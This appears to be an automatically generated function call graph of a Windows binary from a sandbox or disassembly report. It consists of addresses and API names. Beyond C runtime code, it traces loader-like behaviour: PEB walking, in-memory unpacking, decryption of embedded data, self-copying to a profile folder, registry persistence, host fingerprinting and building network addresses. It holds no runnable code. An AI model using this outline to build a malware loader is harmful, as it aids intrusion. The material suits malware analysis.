13527->13514 13529 50e3ba 13528->13529 13560 50e3b3 pre_c_initialization 13528->13560 13530 50e3dd 13529->13530 13531 50e3be 13529->13531 13534 50e42e 13530->13534 13535 50e411 13530->13535 13533 5062a9 __dosmaperr 20 API calls 13531->13533 13532 50a183 _ValidateLocalCookies 5 API calls 13536 50e594 13532->13536 13537 50e3c3 13533->13537 13539 50e444 13534->13539 13578 50e88b 13534->13578 13538 5062a9 __dosmaperr 20 API calls 13535->13538 13536->13521 13540 5062bc _free 20 API calls 13537->13540 13541 50e416 13538->13541 13581 50df31 13539->13581 13540->13560 13544 5062bc _free 20 API calls 13541->13544 13544->13560 13546 50e452 13548 50e456 13546->13548 13549 50e478 13546->13549 13547 50e48b 13550 50e4e5 WriteFile 13547->13550 13551 50e49f 13547->13551 13552 50e54c 13548->13552 13588 50dec4 13548->13588 13593 50dd11 GetConsoleCP 13549->13593 13554 50e508 GetLastError 13550->13554 13559 50e46e 13550->13559 13555 50e4d5 13551->13555 13556 50e4a7 13551->13556 13552->13560 13564 5062bc _free 20 API calls 13552->13564 13554->13559 13619 50dfa7 13555->13619 13561 50e4c5 13556->13561 13562 50e4ac 13556->13562 13559->13552 13559->13560 13566 50e528 13559->13566 13560->13532 13611 50e174 13561->13611 13562->13552 13604 50e086 13562->13604 13565 50e571 13564->13565 13568 5062a9 __dosmaperr 20 API calls 13565->13568 13569 50e543 13566->13569 13570 50e52f 13566->13570 13568->13560 13626 506286 13569->13626 13572 5062bc _free 20 API calls 13570->13572 13573 50e534 13572->13573 13574 5062a9 __dosmaperr 20 API calls 13573->13574 13574->13560 13663 50c9bd LeaveCriticalSection 13575->13663 13577 50e369 13577->13520 13631 50e80d 13578->13631 13651 50d920 13581->13651 13583 50df41 13584 5069e4 pre_c_initialization 35 API calls 13583->13584 13585 50df46 13583->13585 13586 50df69 13584->13586 13585->13546 13585->13547 13586->13585 13587 50df87 GetConsoleMode 13586->13587 13587->13585 13589 50df1e 13588->13589 13592 50dee9 13588->13592 13589->13559 13590 50ea01 WriteConsoleW CreateFileW 13590->13592 13591 50df20 GetLastError 13591->13589 13592->13589 13592->13590 13592->13591 13601 50dd74 13593->13601 13603 50de86 13593->13603 13594 50a183 _ValidateLocalCookies 5 API calls 13595 50dec0 13594->13595 13595->13559 13597 50d2d9 37 API calls __fassign 13597->13601 13598 50ddfa WideCharToMultiByte 13599 50de20 WriteFile 13598->13599 13598->13603 13600 50dea9 GetLastError 13599->13600 13599->13601 13600->13603 13601->13597 13601->13598 13602 50de51 WriteFile 13601->13602 13601->13603 13658 50977f 13601->13658 13602->13600 13602->13601 13603->13594 13609 50e095 13604->13609 13605 50e157 13606 50a183 _ValidateLocalCookies 5 API calls 13605->13606 13608 50e170 13606->13608 13607 50e113 WriteFile 13607->13609 13610 50e159 GetLastError 13607->13610 13608->13559 13609->13605 13609->13607 13610->13605 13614 50e183 13611->13614 13612 50e28e 13613 50a183 _ValidateLocalCookies 5 API calls 13612->13613 13616 50e29d 13613->13616 13614->13612 13615 50e205 WideCharToMultiByte 13614->13615 13618 50e23a WriteFile 13614->13618 13617 50e286 GetLastError 13615->13617 13615->13618 13616->13559 13617->13612 13618->13614 13618->13617 13624 50dfb6 13619->13624 13620 50e069 13621 50a183 _ValidateLocalCookies 5 API calls 13620->13621 13623 50e082 13621->13623 13622 50e028 WriteFile 13622->13624 13625 50e06b GetLastError 13622->13625 13623->13559 13624->13620 13624->13622 13625->13620 13627 5062a9 __dosmaperr 20 API calls 13626->13627 13628 506291 _free 13627->13628 13629 5062bc _free 20 API calls 13628->13629 13630 5062a4 13629->13630 13630->13560 13640 50ca71 13631->13640 13633 50e81f 13634 50e827 13633->13634 13635 50e838 SetFilePointerEx 13633->13635 13637 5062bc _free 20 API calls 13634->13637 13636 50e850 GetLastError 13635->13636 13639 50e82c 13635->13639 13638 506286 __dosmaperr 20 API calls 13636->13638 13637->13639 13638->13639 13639->13539 13641 50ca93 13640->13641 13642 50ca7e 13640->13642 13645 5062a9 __dosmaperr 20 API calls 13641->13645 13647 50cab8 13641->13647 13643 5062a9 __dosmaperr 20 API calls 13642->13643 13644 50ca83 13643->13644 13646 5062bc _free 20 API calls 13644->13646 13648 50cac3 13645->13648 13650 50ca8b pre_c_initialization 13646->13650 13647->13633 13649 5062bc _free 20 API calls 13648->13649 13649->13650 13650->13633 13652 50d93a 13651->13652 13653 50d92d 13651->13653 13655 50d946 13652->13655 13656 5062bc _free 20 API calls 13652->13656 13654 5062bc _free 20 API calls 13653->13654 13657 50d932 pre_c_initialization 13654->13657 13655->13583 13656->13657 13657->13583 13659 5069e4 pre_c_initialization 35 API calls 13658->13659 13660 50978a 13659->13660 13661 509725 __fassign 35 API calls 13660->13661 13662 50979a 13661->13662 13662->13601 13663->13577 13667 50ed00 13664->13667 13666 50eda6 13666->13500 13668 50ed0c ___scrt_is_nonwritable_in_current_image 13667->13668 13678 50c99a EnterCriticalSection 13668->13678 13670 50ed1a 13671 50ed41 13670->13671 13672 50ed4c 13670->13672 13679 50ee29 13671->13679 13674 5062bc _free 20 API calls 13672->13674 13675 50ed47 13674->13675 13694 50ed76 13675->13694 13677 50ed69 ___scrt_is_nonwritable_in_current_image 13677->13666 13678->13670 13680 50ca71 20 API calls 13679->13680 13683 50ee39 13680->13683 13681 50ee3f 13697 50c9e0 13681->13697 13683->13681 13686 50ca71 20 API calls 13683->13686 13693 50ee71 13683->13693 13684 50ca71 20 API calls 13687 50ee7d CloseHandle 13684->13687 13688 50ee68 13686->13688 13687->13681 13690 50ee89 GetLastError 13687->13690 13689 50ca71 20 API calls 13688->13689 13689->13693 13690->13681 13691 506286 __dosmaperr 20 API calls 13692 50eeb9 13691->13692 13692->13675 13693->13681 13693->13684 13706 50c9bd LeaveCriticalSection 13694->13706 13696 50ed80 13696->13677 13698 50ca56 13697->13698 13699 50c9ef 13697->13699 13700 5062bc _free 20 API calls 13698->13700 13699->13698 13705 50ca19 13699->13705 13701 50ca5b 13700->13701 13702 5062a9 __dosmaperr 20 API calls 13701->13702 13703 50ca46 13702->13703 13703->13691 13703->13692 13704 50ca40 SetStdHandle 13704->13703 13705->13703 13705->13704 13706->13696 13707->13476 13708->13458 12468 509264 12471 50821f 12468->12471 12472 508228 12471->12472 12473 508231 12471->12473 12474 50811e 49 API calls 12472->12474 12474->12473 13717 13f4880 13718 13f488f 13717->13718 13719 13f4a9f CryptReleaseContext 13718->13719 13721 13f48be CryptCreateHash 13718->13721 13720 13f4aab 13719->13720 13722 13f48f9 CryptHashData 13721->13722 13723 13f4a90 13721->13723 13724 13f4919 CryptDeriveKey 13722->13724 13725 13f4a83 CryptDestroyHash 13722->13725 13723->13719 13724->13725 13726 13f494a CryptDecrypt CryptDestroyKey 13724->13726 13725->13723 13726->13725 13727 13f4995 CryptCreateHash 13726->13727 13727->13725 13728 13f49b7 CryptHashData 13727->13728 13729 13f49da CryptGetHashParam 13728->13729 13730 13f4a76 CryptDestroyHash 13728->13730 13729->13730 13731 13f4a11 CryptGetHashParam 13729->13731 13730->13725 13731->13730 13732 13f4a3e 13731->13732 13732->13730 11102 50a011 11103 50a01d ___scrt_is_nonwritable_in_current_image 11102->11103 11127 50a87d 11103->11127 11105 50a024 11107 50a04d 11105->11107 11166 50a338 IsProcessorFeaturePresent 11105->11166 11113 50a08c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11107->11113 11138 509801 11107->11138 11110 5097a5 _abort 5 API calls 11110->11113 11111 50a06c ___scrt_is_nonwritable_in_current_image 11112 50a0ec 11142 50a453 11112->11142 11113->11112 11170 508a5e 11113->11170 11115 50a0f2 11146 504025 11115->11146 11128 50a886 11127->11128 11177 50a194 IsProcessorFeaturePresent 11128->11177 11132 50a897 11133 50a89b 11132->11133 11188 50c20b 11132->11188 11133->11105 11136 50a8b2 11136->11105 11139 509818 11138->11139 11140 50a183 _ValidateLocalCookies 5 API calls 11139->11140 11141 509842 11140->11141 11141->11110 11141->11111 11322 50ac20 11142->11322 11144 50a466 GetStartupInfoW 11145 50a479 11144->11145 11145->11115 11349 504490 11146->11349 11148 5041ac 11324 511a93 11148->11324 11152 504480 ExitProcess 11153 50424c 11153->11152 11154 504346 11153->11154 11155 50427c 11153->11155 11154->11152 11157 50435c CreateFileA 11154->11157 11335 504d82 11155->11335 11363 503c6d 11157->11363 11158 5042a7 11339 510d94 11158->11339 11162 5042f5 11343 50ff0d 11162->11343 11163 503c6d CreateNamedPipeA 11164 50433a 11163->11164 11164->11152 11167 50a34e ___scrt_get_show_window_mode 11166->11167 11168 50a3f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11167->11168 11169 50a440 11168->11169 11169->11105 11171 509c2d _abort 11170->11171 11172 508a86 try_get_function 11170->11172 11173 5069e4 pre_c_initialization 35 API calls 11171->11173 11172->11112 11176 509c3e 11173->11176 11174 50731c _abort 35 API calls 11175 509c68 11174->11175 11176->11174 11178 50a1ba 11177->11178 11179 50b4a4 11178->11179 11180 50b4a9 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 11179->11180 11199 50b6b8 11180->11199 11184 50b4bf 11185 50b4ca 11184->11185 11213 50b6f4 11184->11213 11185->11132 11187 50b4b7 11187->11132 11254 50ccc9 11188->11254 11191 50b4cd 11192 50b4d6 11191->11192 11198 50b4e7 11191->11198 11193 50b69d ___vcrt_uninitialize_ptd 6 API calls 11192->11193 11194 50b4db 11193->11194 11195 50b6f4 ___vcrt_uninitialize_locks DeleteCriticalSection 11194->11195 11196 50b4e0 11195->11196 11318 50b975 11196->11318 11198->11133 11201 50b6c1 11199->11201 11202 50b6ea 11201->11202 11203 50b4b3 11201->11203 11217 50b8f5 11201->11217 11204 50b6f4 ___vcrt_uninitialize_locks DeleteCriticalSection 11202->11204 11203->11187 11205 50b66a 11203->11205 11204->11203 11235 50b844 11205->11235 11207 50b674 11208 50b67f 11207->11208 11240 50b8b8 11207->11240 11208->11184 11210 50b68d 11211 50b69a 11210->11211 11245 50b69d 11210->11245 11211->11184 11214 50b71e 11213->11214 11215 50b6ff 11213->11215 11214->11187 11216 50b709 DeleteCriticalSection 11215->11216 11216->11214 11216->11216 11222 50b723 11217->11222 11219 50b90f 11220 50b92c InitializeCriticalSectionAndSpinCount 11219->11220 11221 50b918 11219->11221 11220->11221 11221->11201 11223 50b753 11222->11223 11224 50b757 try_get_function 11222->11224 11223->11224 11226 50b777 11223->11226 11228 50b7c3 11223->11228 11224->11219 11226->11224 11227 50b783 GetProcAddress 11226->11227 11227->11224 11229 50b7e0 11228->11229 11230 50b7eb LoadLibraryExW 11228->11230 11229->11223 11231 50b807 GetLastError 11230->11231 11232 50b81f 11230->11232 11231->11232 11233 50b812 LoadLibraryExW 11231->11233 11232->11229 11234 50b836 FreeLibrary 11232->11234 11233->11232 11234->11229 11236 50b723 try_get_function 5 API calls 11235->11236 11237 50b85e 11236->11237 11238 50b876 TlsAlloc 11237->11238 11239 50b867 11237->11239 11239->11207 11241 50b723 try_get_function 5 API calls 11240->11241 11242 50b8d2 11241->11242 11243 50b8e1 11242->11243 11244 50b8ec TlsSetValue 11242->11244 11243->11210 11244->11243 11246 50b6ad 11245->11246 11247 50b6a7 11245->11247 11246->11208 11249 50b87e 11247->11249 11250 50b723 try_get_function 5 API calls 11249->11250 11251 50b898 11250->11251 11252 50b8af TlsFree 11251->11252 11253 50b8a4 11251->11253 11252->11253 11253->11246 11257 50cce6 11254->11257 11258 50cce2 11254->11258 11255 50a183 _ValidateLocalCookies 5 API calls 11256 50a8a4 11255->11256 11256->11136 11256->11191 11257->11258 11260 50cc47 11257->11260 11258->11255 11261 50cc53 ___scrt_is_nonwritable_in_current_image 11260->11261 11272 507c63 EnterCriticalSection 11261->11272 11263 50cc5a 11273 50c902 11263->11273 11265 50cc69 11271 50cc78 11265->11271 11284 50cadb GetStartupInfoW 11265->11284 11269 50cc89 ___scrt_is_nonwritable_in_current_image 11269->11257 11295 50cc94 11271->11295 11272->11263 11274 50c90e ___scrt_is_nonwritable_in_current_image 11273->11274 11275 50c932 11274->11275 11276 50c91b 11274->11276 11298 507c63 EnterCriticalSection 11275->11298 11278 5062bc _free 20 API calls 11276->11278 11280 50c920 pre_c_initialization ___scrt_is_nonwritable_in_current_image 11278->11280 11279 50c93e 11283 50c96a 11279->11283 11299 50c853 11279->11299 11280->11265 11306 50c991 11283->11306 11285 50caf8 11284->11285 11287 50cb8a 11284->11287 11286 50c902 21 API calls 11285->11286 11285->11287 11288 50cb21 11286->11288 11290 50cb91 11287->11290 11288->11287 11289 50cb4f GetFileType 11288->11289 11289->11288 11291 50cb98 11290->11291 11292 50cbdb GetStdHandle 11291->11292 11293 50cc43 11291->11293 11294 50cbee GetFileType 11291->11294 11292->11291 11293->11271 11294->11291 11317 507cab LeaveCriticalSection 11295->11317 11297 50cc9b 11297->11269 11298->11279 11300 50735f pre_c_initialization 20 API calls 11299->11300 11301 50c865 11300->11301 11305 50c872 11301->11305 11309 507668 11301->11309 11302 5073bc _free 20 API calls 11303 50c8c4 11302->11303 11303->11279 11305->11302 11316 507cab LeaveCriticalSection 11306->11316 11308 50c998 11308->11280 11310 5073f6 pre_c_initialization 5 API calls 11309->11310 11311 50768f 11310->11311 11312 5076ad InitializeCriticalSectionAndSpinCount 11311->11312 11315 507698 11311->11315 11312->11315 11313 50a183 _ValidateLocalCookies 5 API calls 11314 5076c4 11313->11314 11314->11301 11315->11313 11316->11308 11317->11297 11319 50b9a4 11318->11319 11320 50b97e 11318->11320 11319->11198 11320->11319 11321 50b98e FreeLibrary 11320->11321 11321->11320 11323 50ac37 11322->11323 11323->11144 11323->11323 11325 511ada 11324->11325 11328 511cbc 11324->11328 11366 503260 11325->11366 11326 5041fc 11356 510042 11326->11356 11328->11326 11330 511cd2 GetCurrentActCtx 11328->11330 11330->11328 11334 511b65 11334->11326 11334->11334 11336 504e38 11335->11336 11337 504dbe 11335->11337 11336->11158 11337->11336 11399 5103bb 11337->11399 11340 510dda 11339->11340 11342 510de9 11339->11342 11341 510f73 GetNamedPipeHandleStateA 11340->11341 11340->11342 11341->11342 11342->11162 11344 51001b 11343->11344 11347 50ff4d 11343->11347 11345 510013 11344->11345 11346 51002d ExitThread 11344->11346 11345->11164 11347->11347 11403 fe6000 GetPEB 11347->11403 11350 5044f3 11349->11350 11355 5046de 11349->11355 11351 5046ec GetNamedPipeHandleStateA 11350->11351 11353 504502 11350->11353 11352 5047ca ExitThread 11351->11352 11351->11355 11353->11355 12262 503718 11353->12262 11355->11148 11357 510082 11356->11357 11362 5100ba 11356->11362 11358 510091 11357->11358 11359 51020d 11357->11359 12287 503d97 11358->12287 11361 510254 CloseHandle 11359->11361 11361->11362 11362->11153 11364 503cb4 11363->11364 11365 503d29 CreateNamedPipeA 11363->11365 11364->11163 11365->11364 11367 5032b7 11366->11367 11368 503370 11366->11368 11367->11368 11369 503c6d CreateNamedPipeA 11367->11369 11372 501204 11368->11372 11370 503310 11369->11370 11391 510c83 11370->11391 11373 50125a 11372->11373 11374 50135f 11372->11374 11377 501316 11373->11377 11378 50126c VirtualAlloc 11373->11378 11375 501376 11374->11375 11376 50130e 11374->11376 11379 504490 10 API calls 11375->11379 11387 51049e 11376->11387 11377->11376 11383 501343 GetLastError 11377->11383 11382 5012be 11378->11382 11381 5013c4 11379->11381 11384 510042 2 API calls 11381->11384 11395 510288 11382->11395 11383->11377 11385 50141c 11384->11385 11385->11376 11388 5104ef 11387->11388 11389 5104db 11387->11389 11388->11334 11389->11388 11390 510626 CreateThread 11389->11390 11390->11388 11392 510cbe 11391->11392 11393 510cd6 11391->11393 11392->11393 11394 510d17 CreateFileA 11392->11394 11393->11368 11394->11393 11396 5102ee 11395->11396 11397 5102ca 11395->11397 11396->11376 11397->11396 11398 503260 2 API calls 11397->11398 11398->11397 11400 5103f3 11399->11400 11401 5103fd 11399->11401 11400->11401 11402 510476 GetProcessHeap HeapWalk 11400->11402 11401->11336 11402->11401 11402->11402 11404 fe6059 11403->11404 11405 fe61fd VirtualAlloc 11404->11405 11410 fe60e0 11404->11410 11413 fe6ae1 11405->11413 11407 fe6257 VirtualAlloc 11409 fe6297 11407->11409 11408 fe634d LoadLibraryA 11408->11409 11409->11408 11411 fe63be 11409->11411 11410->11345 11417 13f3b00 11411->11417 11414 fe6b0f 11413->11414 11416 fe6b0a 11413->11416 11460 fe6644 11414->11460 11416->11407 11418 13f3b0d 11417->11418 11471 13f2ed0 11418->11471 11420 13f3b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 11474 13f4510 11420->11474 11422 13f400a ExitProcess 11423 13f3b54 11423->11422 11492 13f5700 11423->11492 11427 13f3b9f 11526 13f9400 11427->11526 11433 13f3be1 11543 13f5e00 CreateMutexA GetLastError 11433->11543 11435 13f3beb StrStrIA 11544 13f1120 11435->11544 11446 13f3c92 11592 13f5b50 11446->11592 11450 13f3df8 11454 13f3e30 11450->11454 11632 13f78d0 11450->11632 11453 13f4020 278 API calls 11453->11454 11454->11453 11455 13f3fed Sleep 11454->11455 11458 13f3f09 11454->11458 11619 13f7970 11454->11619 11455->11454 11458->11454 11459 13f3f62 VirtualFree 11458->11459 11636 13f42e0 11458->11636 11641 13f4020 11458->11641 11459->11458 11461 fe6658 11460->11461 11462 fe6670 11461->11462 11464 fe6c01 11461->11464 11462->11416 11465 fe6c28 11464->11465 11467 fe6c42 11465->11467 11468 fe6b8a 11465->11468 11467->11462 11469 fe6b95 RtlAllocateHeap 11468->11469 11470 fe6bad 11469->11470 11470->11467 11664 13f3090 GetPEB 11471->11664 11473 13f2edf 11473->11420 11475 13f47e6 11474->11475 11476 13f4528 11474->11476 11475->11423 11476->11475 11477 13f455b GetModuleFileNameA CreateFileA 11476->11477 11477->11475 11478 13f45a4 GetFileSize 11477->11478 11479 13f45c6 VirtualAlloc 11478->11479 11480 13f47d0 11478->11480 11479->11480 11481 13f45ef ReadFile 11479->11481 11480->11475 11482 13f47d9 CloseHandle 11480->11482 11483 13f4625 11481->11483 11491 13f466f 11481->11491 11482->11475 11484 13f4637 FindCloseChangeNotification 11483->11484 11483->11491 11665 13f47f0 11484->11665 11485 13f47b2 VirtualFree 11485->11480 11488 13f4681 VirtualFree 11489 13f469f 11488->11489 11490 13f47f0 15 API calls 11489->11490 11489->11491 11490->11489 11491->11480 11491->11485 11493 13f5717 11492->11493 11494 13f3b84 11492->11494 11685 13f8f80 11493->11685 11513 13f5a00 11494->11513 11500 13f5773 11754 13f5cd0 11500->11754 11503 13f57d1 11504 13f57f9 GetEnvironmentVariableA 11503->11504 11505 13f57e6 GetAllUsersProfileDirectoryA 11503->11505 11506 13f5810 wnsprintfA CreateFileA 11504->11506 11505->11506 11506->11494 11507 13f5867 GetFileSize 11506->11507 11508 13f5918 CloseHandle 11507->11508 11509 13f5886 VirtualAlloc 11507->11509 11508->11494 11509->11508 11510 13f58ab ReadFile 11509->11510 11511 13f5904 VirtualFree 11510->11511 11512 13f58e4 11510->11512 11511->11508 11512->11508 11514 13f5b44 11513->11514 11515 13f5a18 11513->11515 11514->11427 11515->11514 11516 13f5a3a lstrcpyA 11515->11516 11779 13f5930 11516->11779 11518 13f5a62 11519 13f5a74 lstrlenA 11518->11519 11519->11514 11520 13f5a8c lstrcpyA lstrlenA lstrlenA 11519->11520 11520->11514 11521 13f5abf lstrcatA RegCreateKeyExA 11520->11521 11522 13f5b0a RegCloseKey 11521->11522 11523 13f5b16 11521->11523 11524 13f5b37 lstrlenA 11522->11524 11525 13f5b25 lstrcpyA 11523->11525 11524->11514 11525->11524 11527 13f3bcf 11526->11527 11528 13f941a 11526->11528 11532 13f99f0 GetCurrentProcess OpenProcessToken 11527->11532 11528->11527 11531 13f9502 lstrcpyA CharUpperA 11528->11531 11783 13f8bb0 11528->11783 11799 13f9650 11528->11799 11531->11528 11533 13f9a1f GetTokenInformation 11532->11533 11534 13f3bd7 11532->11534 11535 13f9b76 CloseHandle 11533->11535 11536 13f9a50 GetTokenInformation 11533->11536 11541 13f6060 GetModuleFileNameA 11534->11541 11535->11534 11536->11535 11537 13f9a85 CreateWellKnownSid EqualSid 11536->11537 11537->11534 11538 13f9ad4 CreateWellKnownSid EqualSid 11537->11538 11538->11534 11539 13f9b0a CreateWellKnownSid EqualSid 11538->11539 11539->11534 11540 13f9b40 CreateWellKnownSid EqualSid 11539->11540 11540->11534 11540->11535 11542 13f6091 11541->11542 11542->11433 11543->11435 11545 13f113a 11544->11545 11557 13f1289 11544->11557 11546 13f1144 lstrlenA 11545->11546 11545->11557 11547 13f1156 lstrlenA 11546->11547 11546->11557 11548 13f1168 11547->11548 11547->11557 11549 13f118a GetEnvironmentVariableA 11548->11549 11550 13f1177 GetAllUsersProfileDirectoryA 11548->11550 11551 13f11a1 wnsprintfA lstrcmpiA 11549->11551 11550->11551 11552 13f11db 11551->11552 11553 13f1216 11551->11553 11552->11553 11554 13f11e3 CopyFileA SetFileAttributesA lstrcpyA 11552->11554 11808 13f97a0 GetProcessHeap RtlAllocateHeap 11553->11808 11554->11553 11556 13f1220 lstrcpyA lstrcpyA CreateThread 11556->11557 11558 13f12a3 11556->11558 11809 13f12d0 11556->11809 11560 13f5e30 11557->11560 11559 13f97c0 2 API calls 11558->11559 11559->11557 11561 13f5e5d 11560->11561 11562 13f5e64 RegOpenKeyExA 11560->11562 11561->11562 11563 13f3c39 11562->11563 11564 13f5e8c RegQueryValueExA 11562->11564 11571 13f6cf0 11563->11571 11565 13f5ebc 11564->11565 11567 13f5edc 11564->11567 11565->11567 11568 13f5ece RegDeleteValueA 11565->11568 11566 13f5f15 RegCloseKey 11566->11563 11567->11566 11815 13f9bd0 11567->11815 11568->11567 11572 13f6d0c 11571->11572 11573 13f6d13 RegOpenKeyExA 11571->11573 11572->11573 11574 13f3c4d 11573->11574 11575 13f6d3a RegQueryValueExA 11573->11575 11578 13f5f30 11574->11578 11576 13f6d84 RegCloseKey 11575->11576 11577 13f6d70 RegDeleteValueA 11575->11577 11576->11574 11577->11576 11819 13f7d20 11578->11819 11581 13f5f99 RegOpenKeyExA 11583 13f3c58 11581->11583 11584 13f5fc1 RegQueryValueExA 11581->11584 11582 13f5f92 11582->11581 11589 13f9b90 11583->11589 11585 13f5ffc 11584->11585 11586 13f6041 RegCloseKey 11585->11586 11587 13f9bd0 QueryPerformanceCounter 11585->11587 11586->11583 11588 13f6020 RegSetValueExA 11587->11588 11588->11586 11590 13f3c71 WSAStartup 11589->11590 11591 13f9ba0 QueryPerformanceCounter 11589->11591 11590->11422 11590->11446 11591->11590 11593 13f3dac 11592->11593 11594 13f5b67 11592->11594 11606 13f8a70 11593->11606 11594->11593 11595 13f5b7b lstrlenA lstrlenA 11594->11595 11596 13f5ba3 11595->11596 11597 13f5bab StrStrIA 11596->11597 11598 13f5be0 VirtualAlloc 11596->11598 11597->11596 11599 13f5bdc 11597->11599 11598->11593 11600 13f5c09 11598->11600 11599->11598 11601 13f5c1f StrStrIA 11600->11601 11602 13f5c7f 11600->11602 11601->11602 11603 13f5c39 lstrcpynA 11601->11603 11602->11593 11604 13f5c91 VirtualAlloc 11602->11604 11603->11600 11604->11593 11605 13f5cad 11604->11605 11605->11593 11607 13f8a87 11606->11607 11608 13f8ba3 11606->11608 11607->11608 11609 13f8ab9 CryptAcquireContextA 11607->11609 11608->11450 11610 13f8add GetLastError 11609->11610 11611 13f8b12 11609->11611 11612 13f8aef 11610->11612 11613 13f8af8 CryptAcquireContextA 11610->11613 11611->11608 11614 13f8b1c CryptImportKey 11611->11614 11612->11611 11612->11613 11613->11611 11615 13f8b97 CryptReleaseContext 11614->11615 11616 13f8b41 CryptImportKey 11614->11616 11615->11608 11617 13f8b8d CryptDestroyKey 11616->11617 11618 13f8b68 CryptDecrypt CryptDestroyKey 11616->11618 11617->11615 11618->11617 11620 13f7ae9 11619->11620 11621 13f7987 VirtualAlloc 11619->11621 11620->11454 11621->11620 11622 13f79b6 11621->11622 11821 13fa400 11622->11821 11625 13f7ad8 VirtualFree 11625->11620 11626 13f8a70 9 API calls 11627 13f7a15 11626->11627 11627->11625 11628 13f7a20 VirtualAlloc 11627->11628 11628->11625 11630 13f7a5a 11628->11630 11629 13f7ad0 11629->11625 11630->11629 11631 13f7a89 inet_ntoa wnsprintfA 11630->11631 11631->11630 11633 13f78e4 11632->11633 11634 13f7965 11632->11634 11633->11634 11635 13f7927 inet_ntoa wnsprintfA 11633->11635 11634->11454 11635->11633 11637 13f42fa VirtualAlloc 11636->11637 11638 13f44fd 11636->11638 11637->11638 11640 13f44a3 11637->11640 11638->11458 11640->11638 11828 13f92e0 11640->11828 11642 13f42d7 11641->11642 11643 13f4034 11641->11643 11642->11458 11643->11642 11644 13f405f InitializeCriticalSection CreateEventA 11643->11644 11645 13f409f 11644->11645 11646 13f42cd DeleteCriticalSection 11645->11646 11647 13f40ab EnterCriticalSection 11645->11647 11646->11642 11648 13f40bb VirtualFree 11647->11648 11649 13f40da 11647->11649 11648->11649 11650 13f40f3 ResetEvent LeaveCriticalSection CreateThread 11649->11650 11651 13f40e0 TerminateThread 11649->11651 11836 13f97a0 GetProcessHeap RtlAllocateHeap 11650->11836 11837 13f4ac0 11650->11837 11651->11650 11653 13f4221 WaitForMultipleObjects WaitForSingleObject 11654 13f424f WaitForSingleObject 11653->11654 11655 13f424b 11653->11655 11657 13f4267 TerminateThread 11654->11657 11658 13f4273 EnterCriticalSection 11654->11658 11655->11654 11656 13f413a 11656->11653 11661 13f41d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 11656->11661 11657->11658 11659 13f4283 VirtualFree 11658->11659 11660 13f42a2 LeaveCriticalSection 11658->11660 11659->11660 11662 13f97c0 2 API calls 11660->11662 11661->11656 11850 13f4ba0 CoInitialize 11661->11850 11663 13f42bb 11662->11663 11663->11646 11664->11473 11666 13f4665 11665->11666 11667 13f4807 11665->11667 11666->11488 11666->11489 11666->11491 11667->11666 11668 13f4814 CryptAcquireContextA 11667->11668 11669 13f4856 11668->11669 11670 13f4834 GetLastError 11668->11670 11669->11666 11672 13f4a9f CryptReleaseContext 11669->11672 11673 13f48be CryptCreateHash 11669->11673 11670->11669 11671 13f4841 CryptAcquireContextA 11670->11671 11671->11669 11672->11666 11674 13f48f9 CryptHashData 11673->11674 11675 13f4a90 11673->11675 11676 13f4919 CryptDeriveKey 11674->11676 11677 13f4a83 CryptDestroyHash 11674->11677 11675->11672 11676->11677 11678 13f494a CryptDecrypt CryptDestroyKey 11676->11678 11677->11675 11678->11677 11679 13f4995 CryptCreateHash 11678->11679 11679->11677 11680 13f49b7 CryptHashData 11679->11680 11681 13f49da CryptGetHashParam 11680->11681 11682 13f4a76 CryptDestroyHash 11680->11682 11681->11682 11683 13f4a11 CryptGetHashParam 11681->11683 11682->11677 11683->11682 11684 13f4a3e 11683->11684 11684->11682 11686 13f572e GetModuleFileNameA 11685->11686 11687 13f8f9a 11685->11687 11725 13f1ca0 CreateToolhelp32Snapshot 11686->11725 11687->11686 11688 13f8fed GetVersionExA 11687->11688 11689 13f9266 11688->11689 11690 13f9005 GetSystemInfo 11688->11690 11689->11686 11693 13f926c lstrcatA 11689->11693 11691 13f901c 11690->11691 11692 13f9115 11690->11692 11694 13f9025 lstrcatA 11691->11694 11695 13f9042 11691->11695 11696 13f912b 11692->11696 11697 13f9174 11692->11697 11705 13f9110 11692->11705 11693->11686 11694->11705 11699 13f904b lstrcatA 11695->11699 11709 13f9068 11695->11709 11700 13f914e 11696->11700 11701 13f9134 lstrcatA 11696->11701 11703 13f917d 11697->11703 11704 13f91c3 11697->11704 11699->11705 11700->11705 11706 13f9157 lstrcatA 11700->11706 11701->11705 11711 13f9186 lstrcatA 11703->11711 11712 13f91a0 11703->11712 11704->11705 11714 13f91ef 11704->11714 11715 13f91d5 lstrcatA 11704->11715 11764 13f9290 GetModuleHandleA GetProcAddress 11705->11764 11706->11705 11707 13f9219 lstrcatA 11708 13f9228 lstrlenA 11707->11708 11716 13f9259 lstrlenA 11708->11716 11717 13f9239 lstrcatA lstrcatA 11708->11717 11709->11705 11710 13f90a1 GetSystemMetrics 11709->11710 11718 13f9087 lstrcatA 11709->11718 11719 13f90ad lstrcatA 11710->11719 11720 13f90c7 GetSystemMetrics 11710->11720 11711->11705 11712->11705 11713 13f91a9 lstrcatA 11712->11713 11713->11705 11714->11705 11723 13f91f8 lstrcatA 11714->11723 11715->11705 11716->11689 11717->11716 11718->11705 11719->11705 11721 13f90ed 11720->11721 11722 13f90d3 lstrcatA 11720->11722 11721->11705 11724 13f90f8 lstrcatA 11721->11724 11722->11705 11723->11705 11724->11705 11726 13f1cc9 Process32First 11725->11726 11727 13f1e51 11725->11727 11728 13f1cee GetCurrentProcessId 11726->11728 11729 13f1e44 CloseHandle 11726->11729 11743 13f9d20 11727->11743 11730 13f1d04 11728->11730 11729->11727 11731 13f1d12 11730->11731 11732 13f1d20 Process32Next 11730->11732 11731->11729 11733 13f1d44 Process32First 11731->11733 11732->11730 11732->11731 11733->11729 11734 13f1d5f 11733->11734 11735 13f1e29 Process32Next 11734->11735 11736 13f1d71 lstrlenA 11734->11736 11735->11729 11735->11734 11737 13f1e27 11736->11737 11738 13f1d87 lstrcpyA OpenProcess 11736->11738 11737->11729 11738->11737 11739 13f1dbb EnumProcessModules 11738->11739 11740 13f1de5 GetModuleFileNameExA 11739->11740 11741 13f1e02 GetProcessImageFileNameA 11739->11741 11742 13f1e16 FindCloseChangeNotification 11740->11742 11741->11742 11742->11737 11744 13f9f5d 11743->11744 11745 13f9d37 11743->11745 11744->11500 11745->11744 11746 13f9d4b GetSystemDirectoryA 11745->11746 11746->11744 11747 13f9da8 GetVolumeInformationA 11746->11747 11747->11744 